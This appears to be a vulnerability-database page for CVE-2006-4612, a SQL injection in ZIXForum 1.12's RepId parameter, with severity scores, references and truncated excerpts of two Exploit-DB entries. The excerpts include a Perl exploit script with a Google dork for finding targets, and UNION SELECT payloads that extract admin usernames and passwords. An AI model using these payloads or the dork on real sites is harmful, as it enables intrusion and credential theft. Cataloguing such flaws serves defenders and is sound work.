CVE-2006-4612
published 2006-09-07CVE-2006-4612: SQL injection vulnerability in ReplyNew.asp in ZIXForum 1.12 allows remote attackers to execute arbitrary SQL commands via the RepId parameter.
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.26%
65.9th percentile
SQL injection vulnerability in ReplyNew.asp in ZIXForum 1.12 allows remote attackers to execute arbitrary SQL commands via the RepId parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| john_andersson | zixforum | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Zix Forum 1.12 - 'RepId' SQL Injection (2)
exploitdb·2006-09-17
CVE-2006-4612 Zix Forum 1.12 - 'RepId' SQL Injection (2)
Zix Forum 1.12 - 'RepId' SQL Injection (2)
---
#!/usr/bin/perl
###########################################
# ZIXForum
###########################################
# Google dork:
# intext:"ZIXForum 1.12 by: ZixCom 2002"
###########################################
use IO::Socket::INET;
usage() unless (@ARGV == 2);
$host = shift(@ARGV);
$dir = shift(@ARGV);
$dir = "\/$dir" if ($dir !~ /^\//);
$dir = "$dir\/" if ($dir !~ /\/$/);
$host =~ s/http:\/\///g;
$path = $dir.'ReplyNew.asp?RepId=-1%20UNION%20SELECT%20null,null,null,J_user,null,null,null,null,null,null,null,null%20FROM%20adminlogins';
$path2 = $dir.'ReplyNew.asp?RepId=-1%20UNION%20SELECT%20null,null,null,J_pass,null,null,null,null,null,null,null,null%20FROM%20adminlogins';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr
Exploit-DB
Zix Forum 1.12 - 'RepId' SQL Injection (1)
exploitdb·2006-09-05
CVE-2006-4612 Zix Forum 1.12 - 'RepId' SQL Injection (1)
Zix Forum 1.12 - 'RepId' SQL Injection (1)
---
################################################################################
## ##
## ©ZIXForum 1.12 <= "RepId" Remote SQL Injection ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ##
## Mail | [email protected] ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ##
################################################################################
##########################################################################################################################################################
#Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM a
No writeups or analysis indexed.
http://secunia.com/advisories/21766http://securityreason.com/securityalert/1507http://securitytracker.com/id?1016796http://www.securityfocus.com/archive/1/445204/100/0/threadedhttp://www.securityfocus.com/bid/19855http://www.vupen.com/english/advisories/2006/3476https://exchange.xforce.ibmcloud.com/vulnerabilities/28741http://secunia.com/advisories/21766http://securityreason.com/securityalert/1507http://securitytracker.com/id?1016796http://www.securityfocus.com/archive/1/445204/100/0/threadedhttp://www.securityfocus.com/bid/19855http://www.vupen.com/english/advisories/2006/3476https://exchange.xforce.ibmcloud.com/vulnerabilities/28741
2006-09-07
Published